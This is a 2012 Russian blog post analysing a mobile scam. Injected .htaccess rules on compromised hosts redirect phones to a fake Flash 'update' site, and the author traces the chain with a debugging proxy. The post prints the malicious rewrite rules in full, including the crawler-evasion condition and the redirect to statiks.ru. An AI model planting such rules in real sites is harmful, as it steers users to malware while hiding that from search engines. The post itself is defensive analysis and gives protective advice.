В блоге:

2012-09-16

Мобильные устройств и вирусы/трояны (один из обманов)

Что-то часто стал натыкаться на сайты, на заходе на которые с мобильных устройств выпрыгивает вот такая ересь:



Ясно дело, что к обновлению флеш-плейера это не имеет никакого отношения. Хоть и лень ковыряться, но стало интересно, в какой момент происходит переход на этот зловредный сайт с липовыми "обновлениями".

Поставил отладочный прокси на PC, поменял настройки Wi-Fi на телефоне. После первого же захода на такой сайт увидел в логах переадресацию (302) на некий statiks.ru, на котором еще одна переадресация на сайт (pdacontent.ru), где и предлагают обманку.

Поиск по statiks.ru особо ничего не дал, кроме одной немного квелой, но показательной темы на форуме какого хостера.

Вот как это работает (технически). У хостера подменяется файл .htaccess, прописывая переадресацию для мобильных устройств (которые определяются по user agent):

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]

RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]

RewriteRule (.*) http://statiks.ru/?9 [L,R=302] # On


Не совсем понятно, как именно был получен доступ к .htaccess (то ли хостера поломали, то ли сами юзеры пароли легкие поставили, то ли пароли у юзеров украли), но это не суть важно (для меня). Важно, что нужно следить за .htaccess. ;-)

А для пользователей мобильных устройств полезно, если такая возможность, переключить в настройках браузера user agent с мобильного, на десктопный. В том же Opera Mobile такая возможность есть. Кроме того, после этого многие сайты перестанут подсовывать свои корявые урезанные версии страниц для мобил, которыми невозможно пользоваться.


Интересно, что за "обновлялка" (в случае Андроида)? Смотрите, что выпрыгивает при попытке ее установить:




Слишком много просит! Хотя это никто не читает. ;-) Дальше я проверять не стал, понятно. А ковыряться внутри apk-файла просто лень.

UPD: Подсказывают, что некоторые уроды-владельцы сайтов или админы сами добавляют эти строки в .htaccess для желания "подзаработать". На урановые рудники их.


Изображения из альбомов:

0 comments:

Post a Comment

Blog Archive